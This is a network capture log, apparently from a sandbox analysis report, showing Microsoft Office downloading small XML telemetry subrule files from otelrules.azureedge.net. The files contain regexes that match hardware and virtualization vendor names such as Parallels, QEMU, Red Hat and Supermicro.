                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:50 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 470
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                  x-ms-request-id: db5fa324-001e-00ad-2244-3c554b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185250Z-174c587ffdfmrvb9hC1TEBtn38000000037g00000000qrkk
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:51 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  68192.168.2.74977413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:51 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:51 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB556A907"
                                                                                                                                                                                  x-ms-request-id: 41485cca-c01e-0034-71f5-3c2af6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185251Z-178bfbc474bq2pr7hC1NYCkfgg0000000510000000008cw4
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  69192.168.2.74977513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:51 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 502
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                  x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185252Z-174c587ffdftv9hphC1TEBm29w0000000390000000009ufh
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:53 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  70192.168.2.74977613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:52 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:52 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                  x-ms-request-id: 390d82dd-f01e-0071-4371-3c431c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185252Z-174c587ffdf8lw6dhC1TEBkgs800000003c0000000006msw
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  71192.168.2.74977713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:52 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:53 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                  x-ms-request-id: f3939d66-c01e-00ad-3d3c-3ca2b9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185253Z-178bfbc474bpnd5vhC1NYC4vr400000004xg000000004v99
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  72192.168.2.74977813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:52 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:53 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 408
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                  x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185253Z-178bfbc474bfw4gbhC1NYCunf400000004z000000000152k
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:53 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  73192.168.2.74977913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:53 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 469
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                  x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185254Z-178bfbc474btvfdfhC1NYCa2en00000004w000000000ffzh
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  74192.168.2.74978213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:55 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:55 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 432
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                  x-ms-request-id: 23cbbb45-601e-0084-4e3d-3c6b3f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185255Z-178bfbc474bq2pr7hC1NYCkfgg000000053g000000001hfk
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:55 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  75192.168.2.74978013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:55 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:55 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 416
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                  x-ms-request-id: 5f785e56-701e-0053-0854-3c3a0a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185255Z-178bfbc474brk967hC1NYCfu6000000004h000000000p87m
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:55 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  76192.168.2.74978113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:55 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:55 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                  x-ms-request-id: 7a39f588-d01e-0014-712e-3ded58000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185255Z-178bfbc474bp8mkvhC1NYCzqnn00000004t0000000002rr0
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


